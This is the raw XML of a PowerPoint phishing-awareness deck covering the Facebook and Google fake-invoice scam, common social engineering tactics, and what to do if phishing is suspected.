                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5523E2E5-3A5E-F886-9B86-4F694228A193}"/>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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3137795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2B3AA-A02C-6978-AE80-BA23CBC5DB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A9F1A-A656-766F-4ADF-4A638B8D93A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2373002" y="296656"/>
            <a:ext cx="8869668" cy="1367252"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Facebook and google $100</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23F8B3DA-AE33-BEA8-D8C8-ED9669107360}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="35"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2373002" y="2057400"/>
            <a:ext cx="9071746" cy="4638039"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Bahnschrift SemiBold SemiConden" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Between 2013 and 2015, two of the world’s biggest tech firms were duped out of $100 million (about €90 million at the time) after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift SemiBold SemiConden" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>falling victim to a fake invoice scam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Bahnschrift SemiBold SemiConden" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Bahnschrift SemiBold SemiConden" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A Lithuanian man, Evaldas Rimasauskas, noticed that both organisations use the Taiwanese infrastructure supplier Quanta Computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Bahnschrift SemiBold SemiConden" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>He sent a series of bogus multimillion-dollar invoices replicating the supplier over two years, complete with contracts and letters that appeared to have been signed by executives and agents of Facebook and Google.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Bahnschrift SemiBold SemiConden" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The scam was eventually discovered, and Facebook and Google took legal action. They recovered just under half of the stolen money, while Rimasauskas was arrested and extradited from Lithuania.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Bahnschrift SemiBold SemiConden" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In December 2019, he was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift SemiBold SemiConden" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sentenced to five years in prison</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB6E42F5-624F-A7A7-7C51-E94493198C72}"/>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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="308984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83E06-8BEA-1DD3-D0D6-391C08880EBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="741680" y="430482"/>
            <a:ext cx="10500989" cy="1327464"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Social engineering tactics used in phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CF175D3-F3DC-695F-474B-346EDCA5D60F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="35"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="807039" y="2465539"/>
            <a:ext cx="10136264" cy="3723753"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Pretexting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Attacker creates a fabricated scenario (e.g., pretending to be IT support) to gain sensitive information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Baiting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Lures victims by offering something enticing (e.g., free software) in exchange for personal information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Tailgating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Involves physically following someone into a secure area without their permission, exploiting trust.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Impersonation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers pretend to be someone you know or a trusted authority figure, such as a colleague, manager, or even a representative from a well-known company.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E87B8B6A-2B28-5C38-80E7-0EBE705FFBBF}"/>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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2728059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E810E-8E37-1D8A-245B-020E4E4C0B9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="733562" y="433906"/>
            <a:ext cx="10515601" cy="1327464"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What to do if you suspect a phishing attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D7CECA3-144C-CD4B-9246-81B4F2E65466}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="36"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="814302" y="2465535"/>
            <a:ext cx="10434861" cy="3427265"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Don’t Respond or Click</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Avoid clicking links, downloading attachments, or providing any personal information without consultation from a third person or some kind of verification.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Inform Your IT or Security Team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: If you suspect that you've encountered a phishing attack, it’s essential to report it to your organization’s IT or security team without delay. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Monitor Your Accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: It’s wise to monitor your financial, email, and other important accounts over the next few weeks. Consider placing fraud alerts or freezes with credit agencies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Change Your Passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: If you believe your accounts may have been compromised, update your passwords immediately and enable multi-factor authentication where possible.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD1E69EA-A9E8-C521-7C62-DA1F24879918}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9140971" y="6226198"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FE024F78-56A6-7740-B68D-8D4D026EDF3F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79695288"/>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305301E-11B3-4B9D-A588-21F3C9809371}">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4137456-21FC-4AE2-8A94-BF06CAF2EB9B}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{C77B561B-3A65-4A22-9691-EB838E7F9B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{BDB6449C-E4C9-476A-B4BB-4AECDA22C6CC}tf11936837_win32</Template>
  <TotalTime>211</TotalTime>
  <Words>1126</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>111</Paragraphs>
  <Slides>15</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Algerian</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Nova</vt:lpstr>
      <vt:lpstr>Bahnschrift SemiBold SemiConden</vt:lpstr>
      <vt:lpstr>Biome</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Copperplate Gothic Bold</vt:lpstr>
      <vt:lpstr>Custom</vt:lpstr>
      <vt:lpstr>Phishing</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>What is phishing?</vt:lpstr>
      <vt:lpstr>Types of phishing attacks</vt:lpstr>
      <vt:lpstr>Identifying phishing emails</vt:lpstr>
      <vt:lpstr>one of the biggest phishing spam of all time FACC $61</vt:lpstr>
      <vt:lpstr>Facebook and google $100</vt:lpstr>
      <vt:lpstr>Social engineering tactics used in phishing</vt:lpstr>
      <vt:lpstr>What to do if you suspect a phishing attack</vt:lpstr>
      <vt:lpstr>Phishing in action</vt:lpstr>
      <vt:lpstr>overview</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</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Prabhakar Joshi</dc:creator>
  <cp:lastModifiedBy>Riha Singh</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-05T13:40:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-11T01:37:16Z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